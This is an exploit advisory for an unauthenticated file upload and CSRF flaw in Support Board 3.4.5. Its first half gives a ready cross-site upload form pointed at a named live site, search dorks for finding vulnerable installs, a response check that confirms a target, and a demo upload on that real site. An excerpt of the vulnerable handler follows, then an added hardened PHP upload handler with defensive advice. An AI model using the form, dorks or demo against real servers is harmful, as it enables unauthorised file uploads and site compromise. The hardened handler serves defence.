Exploit Title: Support Board 3.4.5 Arbitrary File Upload / CSRF File Upload
Author: L4663r666h05t
Twitter: https://twitter.com/L4663r666h05t
Vendor Homepage: N/A
POST field name: file
CSRF Code:
<form action="https://www.support.angohost.ao/supportboard/include/upload.php" method="post" target="_blank">
<input type="file" name="file">
<input type="submit" name="kill" value=">>">
</form>
On Non-WP:
/supportboard/include/upload.php
Dork For Non-WP:
supportboard/uploads/
On WP:
/wp-content/plugins/supportboard/supportboard/include/upload.php
Dork for WP:
/wp-content/plugins/supportboard/supportboard/uploads/
Path of the uploaded file:
/supportboard/uploads/(date)/randomname_filename.jpg
/~path/uploads/(date)/randomname_filename.jpg
If vulnerable, upload.php answers a request that carries no file with:
["error","Support Board Error: Key file in $_FILES not found."]
Demo:
https://www.support.angohost.ao/supportboard/include/upload.php
Result:
https://www.support.angohost.ao/supportboard/uploads/01-03-22/69927_0x.jpg
A successful upload returns text like:
["success","SB_URL\/uploads\/(timestamp)\/(random)_(your file name).jpg"]
Vulnerable code in upload.php:
// No login, session or CSRF-token check precedes this block, so any origin can POST to it.
$allowed_extensions = array('json','psd','ai','jpg','jpeg','png','gif','pdf','doc','docx','key','ppt','odt','xls','xlsx','zip','rar','mp3','m4a','ogg','wav','mp4','mov','wmv','avi','mpg','ogv','3gp','3g2','mkv','txt','ico','csv','ttf','font','css','scss');
if (isset($_FILES['file'])) {
    if (0 < $_FILES['file']['error']) {
        die(json_encode(array('error', 'Support Board: Error into upload.php file.')));
    } else {
        $file_name = sb_upload_escape($_FILES['file']['name']);
        $infos = pathinfo($file_name);
        $directory_date = date('d-m-y');
        $path = '../uploads/' . $directory_date;
        $url = SB_URL . '/uploads/' . $directory_date;
        // Only the extension of the client-supplied name is checked; the file's contents are not.
        if (isset($infos['extension']) && in_array(strtolower($infos['extension']), $allowed_extensions)) {
            if (defined('SB_UPLOAD_PATH') && SB_UPLOAD_PATH != '' && defined('SB_UPLOAD_URL') && SB_UPLOAD_URL != '') {
                $path = SB_UPLOAD_PATH . '/' . $directory_date;
                $url = SB_UPLOAD_URL . '/' . $directory_date;
            }
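A hardened version of the same handler, added here as an example and not Support Board's own code: it adds the session and CSRF-token checks the original lacks, validates the sniffed MIME type alongside the extension, and never writes the client-supplied name to disk. The `$_SESSION['sb_user_id']` and `$_SESSION['sb_csrf']` keys, the `csrf` POST field, the reduced allowlist and the 5 MiB limit are assumptions.

```php
<?php
// Hardened upload handler (added example, not Support Board's code).
// Assumed: login sets $_SESSION['sb_user_id'] and $_SESSION['sb_csrf'].
session_start();
header('Content-Type: application/json');
function sb_fail(string $msg, int $status = 400): void {
    http_response_code($status);
    die(json_encode(['error', $msg]));          // same shape as the original replies
}
// 1. Require a logged-in user; the original include/upload.php accepts anyone.
if (empty($_SESSION['sb_user_id'])) {
    sb_fail('Login required.', 401);
}
// 2. Require a per-session CSRF token; a cross-site <form> cannot supply it.
$token = $_POST['csrf'] ?? '';
if (empty($_SESSION['sb_csrf']) || !is_string($token)
        || !hash_equals($_SESSION['sb_csrf'], $token)) {
    sb_fail('Invalid CSRF token.', 403);
}
// 3. Reject missing/failed uploads and anything PHP did not receive via POST.
if (!isset($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK
        || !is_uploaded_file($_FILES['file']['tmp_name'])) {
    sb_fail('Key file in $_FILES not found or upload failed.');
}
if ($_FILES['file']['size'] > 5 * 1024 * 1024) {   // assumed 5 MiB limit
    sb_fail('File too large.', 413);
}
// 4. Allowlist the extension AND the MIME type sniffed from the bytes;
//    the client-supplied name and Content-Type are never trusted.
$allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png',
            'gif' => 'image/gif', 'pdf' => 'application/pdf', 'txt' => 'text/plain'];
$ext  = strtolower(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));
$mime = (new finfo(FILEINFO_MIME_TYPE))->file($_FILES['file']['tmp_name']);
if (!isset($allowed[$ext]) || $mime !== $allowed[$ext]) {
    sb_fail('File type not allowed.');
}
// 5. Store under a random name with the validated extension only.
$dateDir = date('d-m-y');
$dir = __DIR__ . '/../uploads/' . $dateDir;
if (!is_dir($dir) && !mkdir($dir, 0755, true)) {
    sb_fail('Storage error.', 500);
}
$name = bin2hex(random_bytes(16)) . '.' . $ext;
if (!move_uploaded_file($_FILES['file']['tmp_name'], $dir . '/' . $name)) {
    sb_fail('Storage error.', 500);
}
chmod($dir . '/' . $name, 0644);
echo json_encode(['success', '/uploads/' . $dateDir . '/' . $name]);
```

The upload directory should additionally be served with script execution disabled (e.g. no PHP handler for that path), so even a mis-typed file cannot run server-side.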